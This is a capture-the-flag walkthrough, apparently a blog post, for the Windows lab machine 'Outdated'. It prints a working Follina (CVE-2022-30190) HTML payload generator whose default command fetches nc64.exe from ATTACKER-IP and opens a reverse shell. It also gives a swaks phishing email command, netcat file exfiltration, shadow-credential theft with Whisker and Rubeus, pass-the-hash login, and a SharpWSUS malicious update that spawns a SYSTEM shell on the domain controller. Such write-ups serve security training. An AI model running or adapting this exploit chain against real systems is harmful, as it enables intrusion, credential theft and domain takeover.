Outdated
(Medium , Windows)
OVERVIEW
ENUMERATION
So we are given IP now let’s start the enumeration using Nmap
So this time aside from the regular ports we got a Port 25 opened running SMTP service so it might could give us some lead and also we got the Domain and DC name so don’t forget to add these into /etc/hosts file
But let’s start like always with Enumerating SMB through guest login as we don’t have user creds
nxc smb 10.129.229.239 -u guest -p '' --shares
As you can see we got a READ permission on Shares so let’s read it using smbclient
smbclient //10.129.229.239/Shares -U guest%''
so we got NOC_Reminder.pdf file let’s get it and see its contents
So we got a email itsupport@outdated.htb and we also got SMTP Port 25 opened and we are given a list of CVE’s to check it out so i checked most of them and the one that works is CVE-2022-30190 (Follina)
So in Short →
The Follina vulnerability exploits the msdt:// URL protocol to achieve code execution. John Hammond's video provided an excellent technical breakdown when this vulnerability was initially disclosed. The attack mechanism involves abusing Office documents that contain external references to attacker-controlled HTML files. These HTML files use JavaScript to redirect victims to malicious msdt:// URLs.
Under normal circumstances, the Microsoft Diagnostic Tool would display confirmation dialogs requiring user interaction. However, researchers discovered that URLs exceeding 4096 bytes bypass these security prompts.
EXPLOITATION
Now To exploit this vulnerability we will use John Hammond POC uploaded in its GitHub
Now before using this it is discovered that
The typical Follina attack uses Word documents to bypass security prompts, but this approach required modification since Word wasn't installed on the target system. Instead, a standalone HTML page with JavaScript was created (msdt.html) to redirect victims to the malicious msdt:// URL when they clicked the link sent to itsupport@outdated.htb.
Testing revealed additional complications: the email spam filter blocked URLs ending in .doc, preventing successful delivery of traditional payloads.
The final payload was adapted from John Hammond's POC code, specifically extracting the HTML generation component while excluding the Word document creation, web server, and reverse shell handling features that weren't needed for this scenario.
So follina.py will look like this after removing certain things
Don’t forget to open a python server on Port 80 where you have the nc64.exe file
python3 -m http.server 80Don’t forget to replace ATTACKER-IP with your IP
#!/usr/bin/env python3
import base64
import random
import string
import sys
if len(sys.argv) > 1:
command = sys.argv[1]
else:
command = "IWR http://ATTACKER-IP/nc64.exe -outfile C:\\programdata\\nc64.exe; C:\\programdata\\nc64.exe ATTACKER-IP 443 -e cmd"
base64_payload = base64.b64encode(command.encode("utf-8")).decode("utf-8")
# Slap together a unique MS-MSDT payload that is over 4096 bytes at minimum
html_payload = f"""<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\""; //"""
html_payload += (
"".join([random.choice(string.ascii_lowercase) for _ in range(4096)])
+ "\n</script>"
)
print(html_payload)
Now on running this script with python3 follina.py you will get a html code now copy that code and save it inside msdt.html file and be sure to keep msdt.html in the same folder where you started your python server and have nc64.exe file
Now open a listener on Port 443 in another terminal
rlwrap nc -lvnp 443
Now to make the server execute the msdt.html file using msdt:// parameter we will use swaks to send email to itsupport@outdated.htb
Be sure to change your IP below
swaks -t itsupport@outdated.htb -f 0xme0w@reapsec.com --header "Subject: Internal Request" --body "http://YOUR-IP/msdt.html"
This will now go to the SMTP server authenticate and send the email to itsupport@outdated.htb and it will request the msdt.html file from your python server, then request nc64.exe and results in giving a Foothold on our listener
So finally we got a reverse shell as the user btables and do type powershell to enter into powershell session/terminal
LATERAL MOVEMENT
After enumeration inside as btables user i didn’t find anything useful so let’s see bloodhound data for more information and since we don’t have a valid user creds we have to capture it from the inside
So let’s use SharpHound.exe to capture bloodhound data so we would import the SharpHound.exe tool inside the shell
iwr http://YOUR-IP/SharpHound.exe -OutFile SharpHound.exe
now run this inside the shell
.\SharpHound.exe -c all
Now wait for it to finish then if you remember we uploaded nc64.exe inside C:/programdata/
So we can use that to retrieve Bloodhound zip into our local machine
#In Windows Shell
\nc64.exe ATTACKER-IP PORT < 202..........zip
#In Attacker Machine
nc -lvnp PORT > 202.............zip
Now we will see the data in Bloodhound
As you can see we got AddCredentialLink Permission so we could do a Shadow Credential Attack using Whisker.exe
So import the tool into the shell using the same Invoke-WebRequest Method and then
.\Whisker.exe add /target:sflowers
As you can see we got the certificate along with its password which we can use to get the TGT and NTLM hash using Rubeus as shown in the image above
So first import Rubeus.exe of latest version into the shell with same method and then copy the given Rubeus command, paste it and if it shows error then first paste into a text editor and remove the extra spaces so that on pasting it won’t cause issues or just Use AI to fix the format ;)
Now run the command as you already have Rubeus don’t forget to add .\ at the start of the copied command
USER FLAG
As you can see we got the NTLM Hash of the user sflowers so now let’s try login it using evil-winrm
evil-winrm -i 10.129.15.123 -u sflowers -H HASH
And you will get the user flag
PRIVILEGE ESCALATION
Now lets enumerate more for privilege escalation so on seeing the groups with whoami /all
We notice that sflowers is a member of WSUS Administrators group , seems suspicious so i ran winPEAS.exe in order to find anything extra
On running winPEAS.exe i found
So Researching about exploiting WSUS (Windows Server Update Services) I found this BLOG
In this blog it teaches us What is WSUS and How it works?
→ Windows Server Update Services (WSUS) is a centralized patch management system that downloads Microsoft updates once and distributes them to all Windows computers in a corporate network, eliminating the need for each machine to connect directly to the internet.
The vulnerability arises when an attacker compromises the WSUS server with administrative privileges. While WSUS only accepts Microsoft-signed binaries as payloads (like PsExec.exe or PowerShell.exe), attackers can abuse legitimate Microsoft tools by controlling the arguments passed to them.
For example, SharpWSUS can create a malicious "update" that uses the legitimate, signed PsExec.exe binary but passes malicious commands as arguments—such as creating administrator accounts or executing reverse shells.
Since WSUS communicates with nearly all computers in the network, this bypass network segmentation and allows lateral movement to otherwise isolated systems, including Domain Controllers.
The main limitation is that attackers must wait for target machines to check for updates, which could take minutes, hours, days, or weeks depending on the organization's patch deployment schedule.
So let’s use SharpWSUS.exe tool to exploit this to get a reverse shell and if you remember we already have PsExec64.exe in C:/Users/sflowers/Desktop/
.\SharpWSUS.exe create /payload:"C:\Users\sflowers\Desktop\PsExec64.exe" /args:"-accepteula -s -d C:/Users/sflowers/Desktop/nc64.exe -e cmd YOUR-IP 9002" /title:"MEOWTAKEOVER"
The update is made and we got the updateid so copy that /updateid for future commands
Now let’s open the listener in our terminal on port 9002 before approving the update
rlwrap nc -lvnp 9002
Now let’s approve the update to be installed in the client system
SharpWSUS.exe approve /updateid:YOUR-UPDATE-ID /computername:dc.outdated.htb /groupname:"MEOWTAKEOVER"
Now wait for some time to let the update be installed so in meantime you can use the check command to check the status that if the update is installed or not
SharpWSUS.exe check /updateid:YOUR-UPDATE-ID /computername:dc.outdated.htb /groupname:"MEOWTAKEOVER"
I ran the command after some time and It shows installed and if you check on your listener
ROOT FLAG
And you are a root user and now you can get the root flag !!
WE FINALLY DID IT !!!! CHALLENGE SOLVED !!
For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com
THANKS FOR READING !!!
